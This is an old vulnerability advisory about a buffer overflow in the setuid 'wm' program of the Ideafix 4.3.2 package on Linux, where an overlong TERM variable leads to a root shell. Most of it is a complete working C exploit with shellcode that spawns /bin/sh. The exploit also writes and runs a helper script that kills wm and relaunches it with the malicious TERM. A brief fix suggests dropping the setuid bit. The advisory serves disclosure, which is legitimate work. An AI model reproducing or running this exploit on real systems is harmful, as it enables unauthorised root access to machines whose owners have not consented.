COMMAND

    /usr/local/inter-soft/ideafix-4.3.2/bin/wm (Ideafix package)

SYSTEMS AFFECTED

    Linux

PROBLEM

    Bisti  posted  following.A  vulnerability  exist  in  the  package
    Ideafix  distributed  with  several  versions  of  linux.  You may
    obtain it from:

        ftp://sunsite.unc.edu/pub/Linux/devel/ideafix
        ftp://ftp.inter-soft.com/pub/ideafix

    This is a very popular development enviroment (eg. in  Argentina).
    Due  to  the  lack  of  proper  bounds checking in the setuid root
    program wm, the  enviroment variable TERM  is copied into  a local
    fixedsize buffer,  you guess  it, a  shell with  euid=0.   Exploit
    follows:

    /*
     * 'Ideafix wm' Exploit 4 Linux.
     */

    #include <stdio.h>
    #include <stdlib.h>

    #define TERMSIZE        2000
    #define HUEVOSIZE       5000

    char *shell =
       "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
       "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
       "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

    long
    esp(void)
    {
    __asm__("movl %esp,%eax\n");
    }

    int
    main(void)
    {

        char *ptr, *bof, *egg;
        long *addr_ptr, addr;
        int i;


        if ( !(bof = malloc(TERMSIZE)) ) {
          printf("NoMoreMemory4bof.\n");
          exit(1);
        }

        if ( !(egg = malloc(HUEVOSIZE)) ) {
          printf("NoMoreMemory4egg.\n");
          exit(1);
        }

        addr = esp();

        addr_ptr = (long *) bof;
        for (i = 0; i < TERMSIZE; i += 4)
        *(addr_ptr++) = addr;

        ptr = egg;
        for (i = 0; i <= HUEVOSIZE - strlen(shell) - 2; i++)
            *(ptr++) = 0x90;

        for( i = 0; i < strlen(shell); i++)
            *(ptr++) = shell[i];


        bof[TERMSIZE - 1] = '\0';
        egg[HUEVOSIZE - 1] = '\0';

        memcpy(bof, "BOF=", 4);
        memcpy(egg , "EGG=", 4);

        putenv(bof);
        putenv(egg);

        system("echo '#!/bin/sh' >> doit");
        system("echo -n '# We kill any instance of wm, set TERM, ' >> doit");
        system("echo 'and run the vulnerable program.' >> doit");
        system("echo '# Bisti [111097]' >> doit");
        system("echo 'killall wm' >> doit");
        system("echo 'TERM=$BOF;export TERM' >> doit");
        system("echo '/usr/local/inter-soft/ideafix-4.3.2/bin/wm' >> doit");

        system("sh ./doit");

    }

SOLUTION

    Surely, new release will fix  this (exploited is 4.3.2).   I'm not
    sure what  wm really  does as  I don't  have this  package, but if
    everything rest will function without wm having suid bit them  you
    know what you gotta do.